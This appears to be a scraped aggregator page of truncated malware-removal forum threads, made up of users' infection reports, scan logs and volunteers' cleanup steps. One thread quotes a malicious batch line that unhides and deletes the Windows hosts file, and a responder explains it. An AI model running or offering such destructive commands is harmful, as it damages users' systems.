Tech Problem Aggregator

I think I got infected after unpacking a malicious file

Q: I think I got infected after unpacking a malicious file

HJT log removed as we analyze these only in the log forum and then only rarely. ~ OB

A: I think I got infected after unpacking a malicious file

Please describe the problems you are having with your computer so we can assist you better.

Please update MBAM and run a scan in Normal Mode and post the log in your reply as well.

Orange Blossom

1 more replies
Answer Match 64.68%

I'm very sorry, there was some sort of error when I posted this and it posted 3 times.
 
Full System Scan and Power Eraser by Norton came up with nothing. So I seem to have had it for a while, but it's just recently seemed to actually do something. It used to be that every now and then it redirects me, maybe around once every couple weeks, but now it's doing it quite often. It sometimes redirects and sometimes opens up a new page upon clicking something, as well as what I clicked on.
It's worth noting that I had previously been infected with Malicious File Download 12, I assume they're related. Here's the FRST log with addition in the attached files.
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 11-03-2015
Ran by Mason (administrator) on MASON-PC on 19-03-2015 02:03:55
Running from C:\Users\Mason\Desktop\FRST
Loaded Profiles: Mason (Available profiles: Mason)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
... Read more

A:Infected With Malicious File Download 24

Hey, Step 1: AdwarecleanerPlease download AdwCleaner (by Xplode) from the link below and save it to your Desktop:Download Mirror #1Right-click on AdwCleaner.exe and select Run as administrator. (If you have Windows XP the just run it)Click Scan and let the scan run.When it finishes, click Clean, following the on screen promptsAfter your computer reboots, a log will open. Please Copy (Ctrl+C) and Paste (Ctrl+V) this into your next post.Note: The log can also be found in here: C:\AdwCleaner\Step 2: MalwarebytesDownload MalwareBytes Anti-Malware to your desktop.Double-click mbam-setup-2.0.exe to start the installation of Malwarebytes Anti-Malware.Follow the instructions on your screen to complete the installation. You can find the complete installation procedure here.Click the Scan Now button, a threat scan will start automatically.MalwareBytes Anti-Malware will now check for the latest updates. Click Update Now if new updates are available.Your computer is now being scanned, please do not use your computer during the scan.If no threats were found, click View detailed log.Click Export and save the log as a .txt file on your Desktop or another location.If the scan detected any threats, click Apply Actions. To complete any actions taken you will be prompted to restart your computer...click on Yes.After reboot, start Malwarebytes Anti-Malware again and click the History Tab at the top and select Application Logs.Check the box next to Scan Log. Choose the most current scan and click... Read more

26 more replies
Answer Match 64.26%

Hi,

I've downloaded a ad-supported free full game, "Prince of Persia The Sands of Time", and it's installation file don't work ("internal error").

How can I extract it's content without using the installer?
 

A:Unpacking an EXE file

10 more replies
Answer Match 63.84%

Good evening,I am having trouble with the Raila Virus that pops up a picture repeatedly and eventually reboots the computer. It also infects every flash disk entered into the systemWhat I have done so far with no luckDownloaded run and updated Avira Anti VirusDownloaded and run SpybotDownloaded and run Mcfee Stringer (could only get build 3.8.0 as the link to the latest build gave me a 404 error)Here is my log! Thanks!Logfile of Trend Micro HijackThis v2.0.2Scan saved at 8:46:07 PM, on 8/13/2008Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16674)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Sygate\SPF\smc.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exeC:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exeC:\WINDOWS\Explorer.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb03.exeC:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exeC:\Program Files\He... Read more

A:Infected By Raila Virus (a Malicious 32 Bit Pe File)

Hello and welcome to BCWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. We aim to provide the valuable service known to come from BC to every member we can, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.Upon completing the steps below a staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.Thanks and again sorry for the delay. Please see here for instructionshow to install HijackThis and make a logfile. Save it into convenient location and include it to your next reply, please.NextPlease do a scan with Kaspersky Online ScannerNote: If you are using Windows Vista, open your browser by right-clicking on its icon and select 'Run as administrator' to perform this scan.Click on the Accept button and install any components it needs.The program will install and then begin downloading the latest definition files.After the files have been downloaded on the left side of the page in the Scan section select My ComputerThis will start the program and scan your system.The scan will take a while, so b... Read more

2 more replies
Answer Match 48.72%

I was infected by AntiVirus Studio 2010 a few days ago. After some research, I was able to remove it with MalwareBytes Anti-Malware. Since then, my browsers have been hijacked -- all search results get redirected. My OS is MS Vista, SP1.To date, I've runMalwareBytes Anti-Malware SuperAntiSpywarerkillComboFixDDSGMERFor combofix, I ran it with the following script file in the same directory:File::c:\windows\system32\winupdate.exec:\windows\system32\winhelper.dllc:\windows\system32\AVR09.exec:\Program Files\AdvancedVirusRemover\PAVRM.exeMy combofix and DDS logs are attached.I was never able to complete a GMER scan without crashing even though I followed all instructions very carefully.Thanks to boopme for guidance in getting to this point.Any help greatly appreciated.Many thanks, Bo LasaterI have a Sony Vaio, model VGN FZ4000. I still have the problem.Thanks, BoEDIT: Posts merged ~BP

A:Infected with malicious Redirect

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.We need to create an OTL ReportPlease download OTL from one of the following mirrors:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.In the custom scan box paste the following:

msconfig
safebootminimal
activex
drivers32
netsvcs
%SYSTEMDRIVE%\*.exe
/m... Read more

6 more replies
Answer Match 48.72%

Logfile of Trend Micro HijackThis v2.0.2Scan saved at 16:35:36, on 29/08/2008Platform: Windows Vista SP1 (WinNT 6.00.1905)MSIE: Internet Explorer v7.00 (7.00.6001.18000)Boot mode: NormalRunning processes:C:\Windows\System32\smss.exeC:\Windows\system32\csrss.exeC:\Windows\system32\csrss.exeC:\Windows\system32\wininit.exeC:\Windows\system32\services.exeC:\Windows\system32\lsass.exeC:\Windows\system32\lsm.exeC:\Windows\system32\winlogon.exeC:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exeC:\Windows\System32\svchost.exeC:\Windows\system32\Ati2evxx.exeC:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exeC:\Windows\system32\SLsvc.exeC:\Windows\system32\svchost.exeC:\Windows\system32\Ati2evxx.exeC:\Windows\system32\svchost.exeC:\Program Files\Lavasoft\Ad-Aware\aawservice.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\svchost.exeC:\Windows\system32\taskeng.exeC:\Windows\system32\Dwm.exeC:\Windows\Explorer.EXEC:\Windows\system32\taskeng.exec:\Program Files\BT\ISecP\App\syssvcnt.exeC:\Windows\system32\svc... Read more

A:Infected With Various Malicious Softare

Hi cthires I apologize for the delay in response to your thread.If you have since resolved the original problem you were having, I would appreciate you letting us know.. If not please post a new Hjt log so i can see the current condition of your system.Thanks.

2 more replies
Answer Match 48.3%

I'm truly dealing with the malware from hell. It has been an intermittent problem over the last 5-6 years. I get rid of it for a year or so then it comes back and it is a nightmare to get rid of it every time. It is definately the same infection.
It has a rootkit component and a Trojan component. The trojan is now being detected as Trojan.Gen by numerous scanners. The rootkit is always just identified as "unknown rootkit" The rootkit component infects the MBR of any type of storage (HD, Flash drive, SD cards). Previously, Commodo Cleaning Essentials was the only thing that could get rid of the MBR infection. Now nothing will. Does anyone have any suggestions? I'm just thinking about throwing everything out at this point.
I tried overwriting the MBR of the flashdrives with dd but GParted cannot write a new partition table now and it sees the storage as only a few mb in size. I'm pretty sure that this worked in the past.
The malware also uses malicious Chrome Extensions to maintain persistence. I'm finding hidden extensions when I scan with FRST. They're random letter/number names. These just appear randomly within a few hours after re-installing Windows. I always re-install and rewrite the MBR because NOTHING can fully remove this. Lol, burning the HD doesn't seem too extreme at this point.
Is there any way to block Chrome from installing any extensions at all? I don't really need any extensions. It's just weird that they keep coming back - especially since I haven't l... Read more

A:Malicious Chrome Extensions/Infected MBR

Your router may also be infected.
 
Take note of your ISP login information, disconnect from the internet and then hard reset your router. Before re-attaching it to the external network change the admin and network passwords (with your freshly installed Windows machine).
 
To be sure there aren't any hidden persistent partitions on your HDD before re-installing Windows you can "0 fill" it (completely erase) with Seatools for DOS. This will well and truly hose any information on it.

0 more replies
Answer Match 48.3%

.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by CHRIS at 21:23:06 on 2011-11-24
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.1977.917 [GMT 3:00]
.
AV: AntiVir Desktop *Enabled/Updated* {090F9C29-64CE-6C6F-379C-5901B49A85B7}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AntiVir Desktop *Enabled/Updated* {B26E7DCD-42F4-63E1-0D2C-6273CF1DCF0A}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\Program Files (x86)\Adobe\Photoshop Elements 7.0\PhotoshopElementsFileAgent.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\Apple... Read more

A:Infected with system fix malicious malware

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems. Somethings to remember while we are working together.Do not run any other tool untill instructed to do so!please Do not Attach logs or put in code boxes.Tell me about any problems that have occurred during the fix.Tell me of any other symptoms you may be having as these can help also.Do not run anything while running a fix.Do not run any other tool untill instructed to do so!Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.Please print out or make a copy in notpad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.Run Combofix:You may be asked to install or update the Recovery Console (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)Before you run Combofix I will need you to turn off any security software you have running, If you do not know how to do this you can find out >here< or >here<Combofix may need to reboot your computer more than once to do its job this is normal.You can download Combofix from one of these links.Link 1Link 2Link 3 1. Close any open browsers or any other programs that are open.2. Close/disable all anti virus and anti malware programs so they do not interfere with the r... Read more

3 more replies
Answer Match 48.3%

Hello, this is actually my first post in this forum. I am basically facing a problem, and I think my computer is infected with a malicious program. I scanned with Malwarebytes anti-malware twice and I found multiple malicious programs that have been eventually quarantined. I also did an online scan - Result was satisfying as no virus has been found. The first time I scanned with online scan it found a malicious program. I was so happy after the last online scan.. But my other software 'Anti Trojan Elite' said that it found a trojan in my computer - I don't know if it is a coincidence but it says that every time I: Want to use 'Open with..' - Want to open control panel... Please help me resolve this problem. I use windows XP (ofc).

A:My computer is infected with some sort of malicious..

Post the MBAM (Malwarebytes anti-malware) log.

5 more replies
Answer Match 48.3%

Here's the story

Recenty, I sent my laptop to a computer shop to repair my laptop.
After I got it back, it seems that my "Action Center" is turned off, "Firewall" is at off and my "Windows Update" is turned off.
Then I quickly install "Malwarebytes Anti-Malware" & "BitDefender Anti-Virus" and turned on all those stuff which is at off mode.
After running "Malwarebytes Anti-Malware" I got this

http://i.imgur.com/P2MYXTb.png

My question is

- Is it safe to delete them?
- Is "Malwarebytes Anti-Malware" & "BitDefender Anti-Virus" enough to protect my laptop?

[Last edit: 16/02/2013 - Typo error]
 

A:[HELP] On malicious file

7 more replies
Answer Match 48.3%

I have a malicious file that I tried removing through Highjack This and i'm unable to get rid of it.The file is located Crogam Files.The highjack program calls it babe.dat..........Any ideas about this?
 

A:malicious file

11 more replies
Answer Match 48.3%

Alright,
I downloaded a PDF file a few minutes ago. I was already wary of this file, and decided to play it safe and run it sandboxed. I downloaded it and went to the directory.. This is where it went wrong. I accidentaly double clicked it and ran the file.

As expected, nothing (not even adobe pdf reader) opened up . I knew I was in big trouble. I decided to run the file sandboxed and see what changes it made to my machine.

In C:\Program Files (x86)\Common Files\Adobe\SLCache it created a file called 'QUNDRVNTX0NIRUNL.slc'.
In User\Current\AppData\Local\Temp it created a file called amt3. It seemed like some sort of a log. I have included it in the attachments below.

It also created a multitude of registry files. I took a screen shot of them;

I tried running regedit and searching for those files, but to no avail. I found a suspicous program in the startup programs in RegEdit called (Default)-it had no value. I tried doing a system restore to a few days back and I don't think it resolved anything. Here is the DDS log;
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16455 BrowserJavaVersion: 10.9.2
Run by Junaid at 19:39:49 on 2012-12-02
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8154.6366 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
AV: Microsoft Security Essentials *Enabled/Updated* {B140BF4E-23BB-4198-90AB-A51A4C60A69C}
SP: Microsoft Security Essentials *Enabled/Updated... Read more

More replies
Answer Match 48.3%

Hello everyone. This is my first time here and maybe you have already answered this but I cant find anything related.
My problem is that I'm getting the message "malicious file 24 attack" and I'm constantly redirected to advertisings and spam pages.
Norton cannot solve this. 
Is there anything I can do to fix this?
 
Thanks in advance for all your help.

A:malicious file 24

Hello, and to BC.Please follow the instructions below. If you do not understand anything, feel free to stop and ask.Security Check by screen317Download Security Check by screen317 from here or here.Save it to your Desktop.Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.A Notepad document should open automatically called checkup.txt. Please copy and paste the contents of the log in your next reply.===AdwCleaner by XplodePlease download AdwCleaner by Xplode and save to your Desktop.Double click on AdwCleaner.exe to run the tool.Vista/Windows 7/8 users right-click and select Run As AdministratorThe tool will start to update the database, please wait a bit.Click on I agree button.Click on the Scan button.AdwCleaner will begin...be patient as the scan may take some time to complete.After the scan has finished, ensure that all items are checked and click on the Cleaning button.AdwCleaner will asks to reboot to finish cleaning.A log will open when the system finishes rebooting. Please copy and paste the contents of that logfile in your next reply.A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool.===Junkware Removal Tool Please download Junkware Removal Tool to your desktop.Disable all your antivirus and antimalware software - see how to do that here.Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select... Read more

1 more replies
Answer Match 48.3%

How do you delete a file when it says it is being used by another person or program?
 

A:Malicious file?

6 more replies
Answer Match 47.88%

I've downloaded a large application (Quicken) in .rar format. I extracted it with Winrar and now I have 18 tidy little bundles of 15mb each in the intended directory. Bad news is I haven't the faintest idea what to do with them now. there aren't any .exe or installation files as far as I can see--just those 18 bundles. Can anyone straighten me out?
 

A:Unpacking .rar

11 more replies
Answer Match 47.88%

I'm trying to install Renaissance Starter Edition, but the program just unpacks the files somewhere, and doesn't actually start the installation routine. I tried it at work, and it started installing, but on my PC at home, it unpacks the files, then nothing. It goes that fast, I don't know what the files are, or where it's put them. Any suggestions?
 

More replies
Answer Match 47.88%

I am running Windows XP. I have intalled several new programs over the past couple of weeks. I have Malwarebytes' Anti-Malware and have the IP protection enabled. I also have Avira AntiVir Personal - Free Antivirus and keep them updated. I have been having an issue with my computer being very slow and freezing up over the past couple of weeks. Everytime I attempt to open a new site or start IE, it prompts and states it has blocked access to a malicious IP = 95.211.1.176 (it is 80% of the time this IP, but sometimes it is another one; can't remember it though). Also, when I run IE, Avira will alert me stating it has detected a "pattern of the HTML/Infected.WebPage.Gen.HTML script virus" and I will quarantine this. This has alerted me on sites such as Google, eBay, eBates and others. I am unsure what is going on. I have gone into my Windows\Temp folder and have found "Perflib_Perfdata_34c" which is unable to delete due to it "being used by another program." Also, Malwarebytes' has found several items that it has quarantined, and I would list them right now, but I am running a full scan and can't access the quarantine files. I don't really see anything different in the task manager, but I am not sure. Avira and Malwarebytes' don't find anything during scans. I also have TuneUp Utilities 2009 and try to keep my computer "cleaned up" through the workings of that program as well.I am unsure this has anythig t... Read more

A:Malwarebytes keeps blocking access to a malicious IP... Am I infected?

Update mbam and run a FULL scanPlease post the results-------------------------------ATFPlease download ATF Cleaner by Atribune & save it to your desktop.Double-click ATF-Cleaner.exe to run the program.Under Main "Select Files to Delete" choose: Select All.Click the Empty Selected button.If you use Firefox browser click Firefox at the top and choose: Select AllClick the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.If you use Opera browser click Opera at the top and choose: Select AllClick the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.Click Exit on the Main menu to close the program.Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".------------------------------------SAS, may take a long time to scanPlease download and scan with SUPERAntiSpyware FreeDouble-click SUPERAntiSypware.exe and use the default settings for installation.An icon will be created on your desktop. Double-click that icon to launch the program.If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. ... Read more

8 more replies
Answer Match 47.88%

I get the message:
"Bit Defender has blocked a potentially malicious or infected application"

The application apparently is part of the Microsoft Windows Operating System:
C:\Windows\System 32\svchost.exe

Bit Defender blocks it and I'm not sure I can allow it because of previous problems involving blue screens and stop errors. Dell support was unable to help me, as a matter of fact they made things worse by uninstalling a video adapter and then installing one meant for Vista on my XP laptop. So, I restored to a previous point and haven't seen a blue screen since but it's only been a week or so. I also uninstalled McAfee which came with the computer and installed Bit Defender which still has some life from the previous computer. That's when I started getting the above message. Neither McAfee or Bit Defender found anything wrong with malware or spyware.
Normally, I would allow the program to run since you would think a new computer would not have a corrupted operating system, but because one of the techs at Dell suggested that that was the problem with my blue screens and the fact that I haven't been able to use the delete key since day one and that the delete key works in safe mode. According to him, 2/3 of the time it's due to spyware. They want me to restore the computer to its original day one status. It took me two days to get all my programs and stuff moved from the old computer, so I'm not really too anxious to start all ove... Read more

A:Potentially malicious or infected application says Bit Defender

16 more replies
Answer Match 47.88%

Hi,

I'm a consultant, with a client that received an email with a suspicious link. I was able to download the html file from the redirected site without running it, and took a look at it in a text editor. It's obviously specially crafted, but it's beyond my ability to decipher. Could anyone interpret the file to figure out what the payload is supposed to be?

It's a 191K file, and I'm not sure how best to attach it. If someone could let me know, I'd appreciate it.

Thanks in advance,

Charlie T.

A:Likely malicious html file - can someone take a look?

You can upload it here. Please put it in a .zip archive first.

5 more replies
Answer Match 47.88%

Hi,

For years I?ve been running my HP desktop with ZoneAlarm but no permanently-on AV program ? just doing regular scans with Panda Security or House Call AV. I?ve been very careful not to open suspicious emails or visit any ?dubious? websites, and I?ve been ok ?until recently.

Well, I guess it was going to happen eventually. I visited a respectable looking website (well, maybe not *so* respectable: a real estate agent!) and ZA announced that wpv831252894422.exe wanted to access the net?

I tried a number of AV tools to get rid of the infection:

***Panda
- found and disinfected ndis.sys (W32/Protector.A?)
- labeled as suspicious reader_s.exe (trojan.neprodoor?)

***Kaspersky Virus Removal Tool
- detected reader_s (Win32.FraudLoad.fpt?)
- detected wpv[?].exe (Win32.Bredolab.zy?)
- detected JS.Agent.anr
- detected Win32.Protector.b
- detected ikowin32.exe

***Avira found nothing

***Norton AV found nothing

***Malwarebytes
- found and removed wiaserva.log
- found and removed reg.key AG Protect

And now it seems I?m left with:

***Kaspersky AV 2010
detects HEUR:Trojan.Win32.Generic (C:\WINDOWS\Temp\wpv831252894422.exe) and quarantines the file, but then detects it again - about every 2 hours, in fact.

I don?t know how to get rid of this, but I wonder if the problem?s somehow linked to one of several instances of svchost.exe on the machine. I remember reading somewhere that Bredolab can modify svchost.exe.

I?d really appreciat... Read more

A:Malicious file wpv831252894422.exe

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.Please download OTL from following mirror:This is THE MirrorSave it to your desktop.Double click on the icon on your desktop.Click the "Scan All Users" checkbox.Push the button.Two reports will open, copy and paste them in a reply here:OTL.txt <-- Will be openedExtra.txt <-- Will be minimizedIn the upper right hand corner ... Read more

15 more replies
Answer Match 47.88%

i was just checking around system performance-config file etc. and noticed this strange file called bigdog.exe. so i checked few forum and noticed that it's a spyware first spoted or perhaps originated in china and then it was spoted in few european nation.
so personally i removed it as i hate to have any useless file on my computer. it'was under c:\windows directory ( just type bigdog.exe on search tab and you will see where it located)

A:malicious file ! (bigdog.exe)

The file "bigdog.exe" is known to be created under the following filenames:
%System%\bigdog.exe
%Temp%\dogok\bigdog.exe
c:\bigdog.exe

2 more replies
Answer Match 47.88%

Hello, a person has sent me a .bat file telling me it's a game. I have opened the file in my text editor, it contained this line:

@Echo off cd Windows/system32/drivers/etc attrib hosts -r -h del hosts

Can someone tell me what would this do exactly, and how pissed should I be with that person?

Thanks in advance.
 

A:A Bat file, most probably malicious - Question

You should be very pissed off at the person, since this is a batch file - clearly not a game - and the command removes the Read-Only and Hidden attributes of the Hosts file, and then attempts to delete said file. However, they've screwed it up and it wouldn't work properly anyway. That's not the point, though.
 

2 more replies
Answer Match 47.46%

Hello,

Yesterday I downloaded windows.iso via the Media Creation Tool (it took 8 hours!!). I clicked it today to unpack its contents and failed because an error message told me that there is no program associated with it. I panicked and associated it with Windows Media Player but am scared stiff to use it or do anything. Can anyone help please?

Herefordian

A:Unpacking windows.iso

Hi,

You can use the free program 7-zip to extract iso (and other) files: 7-Zip

7 more replies
Answer Match 47.46%

Hello everyone
It's a long time since I don't write an article in MA but I decided to explore some important concepts to analyze malware.

"Understanding packers and detecting a packed file" is a topic treated by @kram7750 in this thread :http://malwaretips.com/threads/malw...ng-packers-and-detecting-a-packed-file.42356/

I will talk to unpacking
The manual unpacking is definitely the most complex to learn. Although a malware can be sometimes much more difficult by a packer, it is much easier to explain the theory behind a malware, rather than explain the operation of a packer. This is primarily due to two reasons. First, you need to have a unpacking knowledge of a wider number of arguments: it is not enough to understand the machine code and know that debugging. In addition, the term "packer" is very generic. The packer implement all sorts of anti-reversing techniques and even an entire book would suffice to explain them all in detail.

I will try to make myself understood even by those who don't have a clue what a packer. However, it is useless to deny that you have to engage, and not just to see this introduction. Do not confuse, even if there are other threads, this article represents the real end of our route. If you include the following, all the rest you'll learn without difficulty and it will update your knowledge base package. Here, we define the article on manual unpacking the culmination of knowledge. To write this introd... Read more

More replies
Answer Match 47.46%

I recently ordered a new PC from ironsidecomputers and it didn't work when I plugged it in, I later pulled the front connectors loose replugged them and was able to get it running but the reset powered it on power button reset the system. I was happy but PC was in the wrong spot so I turned it off put it where it need to be and nothing I tried all other outlets then the one that worked previously but nothing. I referred to manual and seemed original set up was wrong but I'm not getting to work in the right set up. What am I doing wrong is it just power problem? I would be talking to tech but it's the weekend. Motherboard is as rock z97 pro 3, Intel core I5 4590 processor, evga 500 watt, nvadia GeForce Gtx 750ti graphics card, 8 ram, win 10, enermax thorax case

A:PC has no power after unpacking

Sounds like to me the front panel connection is hooked up wrong, which could do some damage to the system over time. If your not comfortable taking it apart and reconnecting all if it, I'd wait and take it back to the place where you bought it and have them look at it and fix it.

1 more replies
Answer Match 47.46%

She's using 8.1  She tells me she found something indicating "remote monitoring software" and it's capable of disabling and even remaining undetected by some antiviruses. It disabled her Kapersky and window's defender.
 
I believe she spread it to her computer using compromised usb (She is a beginner when it comes to computer and has ruined many computers before realizing that she's used an infected USB that spreads to uninfected computers .
 
She's went to malwaretips.com to treat her computer, but she was unable to come to a resolution.  She ruined one of her computers by calling geeksquad and doing some unknown thing (to me) over the phone (which was like pouring oil on a forest fire). She's scared that she may ruin her roommates computer as well and thusly I am here trying to find a resolution to her problem.
 
She has scanned with FRST and Zoek. I've the files that she uploaded if needed. There is also some chinese/ eastern font 
 
http://imgur.com/4SHlHUo
 
This is the file she showed me and she has another in her history. The people in malwaretips says her computer isn't infected, but there is some thing that is going on. Her old computer was a breeding ground for viruses and I highly doubt she would not accidentally spread it to her roommate's computer by sharing usb. Her room mate's computer was brand new and it suddenly began behaving strangely... there must be some way to find out what's wrong with it.
 
 
Edit: She... Read more

A:My friend's computer is infected with some unknown malicious program(s).

Hello ..
If you need more assistance with any malware infection, other advanced tools are available but they cannot be used in this forum. Please follow the instructions in the Malware Removal and Log Section Preparation Guide starting at Step 6.
If you cannot complete a step, then skip it and continue with the next.
In Step 6 there are instructions for downloading and running FRST which will create two logs.
When you have done that, post your logs in the Virus, Trojan, Spyware, and Malware Removal Logs forum, NOT here, for assistance by the Malware Response Team only.Start a new topic, give it a relevant title and post your log(s) along with a brief description of your problem, a summary of any anti-malware tools you have used and a summary of any steps that you have performed on your own.If you cannot produce any of the required logs...start the new topic anyway. Explain that you followed the Prep. Guide, were unable to create the logs, and describe what happened when you tried to create them then describe your problem. A member of the Malware Removal Team will walk you through, step by step, on how to clean your computer.

After doing this, please reply back in this thread with a link to the new topic so we can close this one, so any unwanted advice will not be posted.
 
Thank You
 

6 more replies
Answer Match 47.46%

Hello,
I'm fighting with this virus since 2 days. It has blocked my taskmanager, cmd, folder options is disabled. If I open any site in internet explorer, it is being redirected to some other page that says 'This site is blocked'. Same thing happens even in Safe Mode. The virus continuously prompts saying that 'The system detected a potential hazard. Click here to download the official intrusion detection system'. I was able to run rootrepeal scan on the infected system. I have attached the log.
The virus didn't let me run the dds.scr script since the script tries to open command prompt.
Please help me.

A:Infected with some malicious virus - taskmgr, cmd, explorer blocked

Please help me. I'm new here and followed the instructions on how to post a new topic. I've also attached the rootrepeal log file. Not sure why nobody is replying to this post.

4 more replies
Answer Match 47.46%

Hi. I ran Kaspersky a bit back and it notified me of malicious software/programs on my computer. The computer is a Windows XP and it has been running slow for a while now.

Below is my Hijack This Log. Any help would be appreciated.


Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:29:32 AM, on 3/3/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16608)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\Mixer.exe
C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe
C:\WINDOWS\SYSTEM32\qttask.exe
C:\Program Files\Brother\ControlCenter3\brccMCtl.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\WINDOWS\system32\LVCOMSX.EXE
C:\Program Files\Logitech\Video\LogiTray.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
C:\Program Files\NetAssistant\bin\mpbtn.exe
C:\Program Files\Logitech\Video\FxSvr2.exe
C:\Program Files\Brother\Brmfcmon\BrMfcmon.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLLoginProxy.exe
C:\WINDOWS\system32\wuauc... Read more

A:Infected Computer - Running Slow With Malicious Programs, Help!

6 more replies
Answer Match 47.46%

Hello again!

As I had an EXCELLENT experience with Gringo the last time around, I thought I'd stop back with my next project.

This is a Dell Inspiron 530 desktop running Windows 7 Professional, 32-bit. This is one of the main computers at a small business. I mention this because it includes some programs not normally found on personal computers I've worked on in the past. This includes Dyn Updated, Quickbooks, Intuit Data Backup, to name a few. I figure this might make it a bit more difficult when navigating around while we clean.

